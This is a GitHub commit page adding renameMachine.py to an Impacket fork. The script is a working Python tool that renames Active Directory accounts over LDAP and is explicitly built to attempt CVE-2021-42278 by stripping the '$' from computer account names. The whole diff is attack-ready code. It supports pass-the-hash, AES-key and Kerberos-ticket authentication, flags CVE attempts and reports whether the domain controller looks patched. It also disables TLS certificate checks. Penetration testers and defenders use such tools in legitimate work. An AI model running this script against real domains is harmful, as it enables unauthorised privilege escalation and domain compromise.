Skip to content

Commit

Permalink
Merge pull request #69 from ShutdownRepo/CVE-2021-42278
Browse files Browse the repository at this point in the history
fortra#1224 Added renameMachine.py
  • Loading branch information
ShutdownRepo authored Aug 4, 2024
2 parents 18d2593 + 0c74df0 commit 0a8a3fb
Showing 1 changed file with 378 additions and 0 deletions.
378 changes: 378 additions & 0 deletions examples/renameMachine.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,378 @@
#!/usr/bin/env python3
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Python script for modifying the sAMAccountName of an account (can be used for CVE-2021-42278)
#
# Authors:
# @snovvcrash
# Charlie Bromberg (@_nwodtuhs)
#

import argparse
import logging
import sys
import traceback
import ldap3
import ssl
import ldapdomaindump
from binascii import unhexlify
import os

from impacket import version
from impacket.examples import logger, utils
from impacket.smbconnection import SMBConnection
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
from ldap3.utils.conv import escape_filter_chars


def get_machine_name(args, domain):
if args.dc_ip is not None:
s = SMBConnection(args.dc_ip, args.dc_ip)
else:
s = SMBConnection(domain, domain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
raise Exception('Error while anonymous logging into %s' % domain)
else:
s.logoff()
return s.getServerName()


def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None,
TGT=None, TGS=None, useCache=True):
from pyasn1.codec.ber import encoder, decoder
from pyasn1.type.univ import noValue
"""
logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.
:param string user: username
:param string password: password for the user
:param string domain: domain where the account is valid for (required)
:param string lmhash: LMHASH used to authenticate using hashes (password is not used)
:param string nthash: NTHASH used to authenticate using hashes (password is not used)
:param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
:param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
:param struct TGT: If there's a TGT available, send the structure here and it will be used
:param struct TGS: same for TGS. See smb3.py for the format
:param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False
:return: True, raises an Exception if error.
"""

if lmhash != '' or nthash != '':
if len(lmhash) % 2:
lmhash = '0' + lmhash
if len(nthash) % 2:
nthash = '0' + nthash
try: # just in case they were converted already
lmhash = unhexlify(lmhash)
nthash = unhexlify(nthash)
except TypeError:
pass

# Importing down here so pyasn1 is not required if kerberos is not used.
from impacket.krb5.ccache import CCache
from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5 import constants
from impacket.krb5.types import Principal, KerberosTime, Ticket
import datetime

if TGT is not None or TGS is not None:
useCache = False

if useCache:
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except Exception as e:
# No cache present
print(e)
pass
else:
# retrieve domain information from CCache file if needed
if domain == '':
domain = ccache.principal.realm['data'].decode('utf-8')
logging.debug('Domain retrieved from CCache: %s' % domain)

logging.debug('Using Kerberos Cache: %s' % os.getenv('KRB5CCNAME'))
principal = 'ldap/%s@%s' % (target.upper(), domain.upper())

creds = ccache.getCredential(principal)
if creds is None:
# Let's try for the TGT and go from there
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logging.debug('Using TGT from cache')
else:
logging.debug('No valid credentials found in cache')
else:
TGS = creds.toTGS(principal)
logging.debug('Using TGS from cache')

# retrieve user information from CCache file if needed
if user == '' and creds is not None:
user = creds['client'].prettyPrint().split(b'@')[0].decode('utf-8')
logging.debug('Username retrieved from CCache: %s' % user)
elif user == '' and len(ccache.principal.components) > 0:
user = ccache.principal.components[0]['data'].decode('utf-8')
logging.debug('Username retrieved from CCache: %s' % user)

# First of all, we need to get a TGT for the user
userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
if TGT is None:
if TGS is None:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,
aesKey, kdcHost)
else:
tgt = TGT['KDC_REP']
cipher = TGT['cipher']
sessionKey = TGT['sessionKey']

if TGS is None:
serverName = Principal('ldap/%s' % target, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,
sessionKey)
else:
tgs = TGS['KDC_REP']
cipher = TGS['cipher']
sessionKey = TGS['sessionKey']

# Let's build a NegTokenInit with a Kerberos REQ_AP

blob = SPNEGO_NegTokenInit()

# Kerberos
blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]

# Let's extract the ticket from the TGS
tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
ticket = Ticket()
ticket.from_asn1(tgs['ticket'])

# Now let's build the AP_REQ
apReq = AP_REQ()
apReq['pvno'] = 5
apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

opts = []
apReq['ap-options'] = constants.encodeFlags(opts)
seq_set(apReq, 'ticket', ticket.to_asn1)

authenticator = Authenticator()
authenticator['authenticator-vno'] = 5
authenticator['crealm'] = domain
seq_set(authenticator, 'cname', userName.components_to_asn1)
now = datetime.datetime.utcnow()

authenticator['cusec'] = now.microsecond
authenticator['ctime'] = KerberosTime.to_asn1(now)

encodedAuthenticator = encoder.encode(authenticator)

# Key Usage 11
# AP-REQ Authenticator (includes application authenticator
# subkey), encrypted with the application session key
# (Section 5.5.1)
encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)

apReq['authenticator'] = noValue
apReq['authenticator']['etype'] = cipher.enctype
apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

blob['MechToken'] = encoder.encode(apReq)

request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO',
blob.getData())

# Done with the Kerberos saga, now let's get into LDAP
if connection.closed: # try to open connection if closed
connection.open(read_server_info=False)

connection.sasl_in_progress = True
response = connection.post_send_single_response(connection.send('bindRequest', request, None))
connection.sasl_in_progress = False
if response[0]['result'] != 0:
raise Exception(response)

connection.bound = True

return True

def init_ldap_connection(target, tls_version, args, domain, username, password, lmhash, nthash):
user = '%s\\%s' % (domain, username)
connect_to = target
if args.dc_ip is not None:
connect_to = args.dc_ip
if tls_version is not None:
use_ssl = True
port = 636
tls = ldap3.Tls(validate=ssl.CERT_NONE, version=tls_version)
else:
use_ssl = False
port = 389
tls = None
ldap_server = ldap3.Server(connect_to, get_info=ldap3.ALL, port=port, use_ssl=use_ssl, tls=tls)
if args.k:
ldap_session = ldap3.Connection(ldap_server)
ldap_session.bind()
ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, args.aesKey, kdcHost=args.dc_ip)
elif args.hashes is not None:
ldap_session = ldap3.Connection(ldap_server, user=user, password=lmhash + ":" + nthash, authentication=ldap3.NTLM, auto_bind=True)
else:
ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True)

return ldap_server, ldap_session


def init_ldap_session(args, domain, username, password, lmhash, nthash):
if args.k:
target = get_machine_name(args, domain)
else:
if args.dc_ip is not None:
target = args.dc_ip
else:
target = domain

if args.use_ldaps is True:
try:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1_2, args, domain, username, password, lmhash, nthash)
except ldap3.core.exceptions.LDAPSocketOpenError:
return init_ldap_connection(target, ssl.PROTOCOL_TLSv1, args, domain, username, password, lmhash, nthash)
else:
return init_ldap_connection(target, None, args, domain, username, password, lmhash, nthash)


def parse_identity(args):
domain, username, password = utils.parse_credentials(args.identity)

if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)

if password == '' and username != '' and args.hashes is None and args.no_pass is False and args.aesKey is None:
from getpass import getpass
logging.info("No credentials supplied, supply password")
password = getpass("Password:")

if args.aesKey is not None:
args.k = True

if args.hashes is not None:
lmhash, nthash = args.hashes.split(':')
else:
lmhash = ''
nthash = ''

return domain, username, password, lmhash, nthash


def init_logger(args):
# Init the example's logger theme and debug level
logger.init(args.ts)
if args.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)


def parse_args():
parser = argparse.ArgumentParser(add_help=True, description='Python script for modifying the sAMAccountName of an account (can be used for CVE-2021-42278)')
parser.add_argument('identity', action='store', help='domain.local/username[:password]')
parser.add_argument("-current-name", type=str, required=True, help="sAMAccountName of the object to edit")
parser.add_argument("-new-name", type=str, required=True, help="New sAMAccountName to set for the target object")
parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true",
help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If '
'omitted it will use the domain part (FQDN) specified in '
'the identity parameter')

if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)

return parser.parse_args()


def get_user_info(samname, ldap_session, domain_dumper):
ldap_session.search(domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])
try:
dn = ldap_session.entries[0].entry_dn
return dn
except IndexError:
logging.error('Machine not found in LDAP: %s' % samname)
return False


def main():
print(version.BANNER)
args = parse_args()
init_logger(args)

domain, username, password, lmhash, nthash = parse_identity(args)
if len(nthash) > 0 and lmhash == "":
lmhash = "aad3b435b51404eeaad3b435b51404ee"

ldap_server, ldap_session = init_ldap_session(args, domain, username, password, lmhash, nthash)

cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = None
domain_dumper = ldapdomaindump.domainDumper(ldap_server, ldap_session, cnf)
operation = ldap3.MODIFY_REPLACE
attribute = 'sAMAccountName'
dn = get_user_info(args.current_name, ldap_session, domain_dumper)

if not dn:
logging.error('Account to modify does not exist! (forgot "$" for a computer account? wrong domain?)')
return
try:
logging.info('Modifying attribute (%s) of object (%s): (%s) -> (%s)' % (attribute, dn, args.current_name, args.new_name))
cve_attempt = False
if "CN=Computers" in dn and attribute == 'sAMAccountName' and not args.new_name.endswith('$'):
cve_attempt = True
logging.info('New sAMAccountName does not end with \'$\' (attempting CVE-2021-42278)')
ldap_session.modify(dn, {attribute: [operation, [args.new_name]]})
if ldap_session.result['result'] == 0:
logging.info('Target object modified successfully!')
else:
error_code = int(ldap_session.result['message'].split(':')[0].strip(), 16)
if error_code == 0x523 and cve_attempt:
logging.debug('The server returned an error: %s', ldap_session.result['message'])
# https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e
logging.error('Server probably patched against CVE-2021-42278')
elif ldap_session.result['result'] == 50:
logging.error('Could not modify object, the server reports insufficient rights: %s', ldap_session.result['message'])
elif ldap_session.result['result'] == 19:
logging.error('Could not modify object, the server reports a constrained violation: %s', ldap_session.result['message'])
else:
logging.error('The server returned an error: %s', ldap_session.result['message'])
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
traceback.print_exc()
logging.error(str(e))

if __name__ == '__main__':
main()

0 comments on commit 0a8a3fb

Please sign in to comment.